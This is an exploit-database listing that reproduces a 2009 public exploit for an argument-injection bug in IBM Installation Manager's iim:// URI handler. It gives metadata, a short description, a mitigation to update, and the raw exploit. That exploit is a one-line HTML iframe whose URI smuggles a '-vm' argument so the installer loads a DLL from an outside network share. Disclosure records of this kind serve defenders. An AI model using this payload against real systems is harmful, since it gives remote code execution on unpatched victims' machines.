IBM Installation Manager - exploit.company

vendor:

Rational Robot

by:

nine:situations:group::bruiser

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Rational Robot

Affected Version From: 1.3.2000

Affected Version To: 1.3.2000

Patch Exists: Yes

Related CWE: N/A

CPE: a:ibm:rational_robot

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Internet Explorer

2009

IBM Installation Manager <= 1.3.0 iim:// uri handler remote code execution exploit - IE

It is possible to specify extra command line arguments, ex. the -vm argument for the IBMIM.exe executable, which will load an arbitrary dll from an external network share, change the path to your own library with some code in the entry point.

Mitigation:

Update to the latest version of IBM Installation Manager.

Source

Exploit-DB raw data:

<!--
IBM Installation Manager <= 1.3.0 iim:// uri handler remote code execution exploit - IE
by nine:situations:group::bruiser
site: http://retrogod.altervista.org/

vulnerable:
IBM Rational Robot
IBM Rational Team Concert
possibly all Rational products, not Rational Appscan I see

download location: http://www14.software.ibm.com/webapp/download/byproduct.jsp?pgel=ibmhzn1&cm_re=masthead-_-supdl-_-dl-trials
info: http://www-01.ibm.com/software/rational/installmgr/faq.html

bug:
through Internet Explorer is possible to specify extra command line arguments, ex.
the -vm argument for the IBMIM.exe executable, which will load an arbitrary dll
from an external network share, change the path to your own library with some code
in the entry point
-->

<iframe src='iim://"%20-vm%20\\192.168.0.1\uncshare\sh.dll%20-url%20"'></iframe>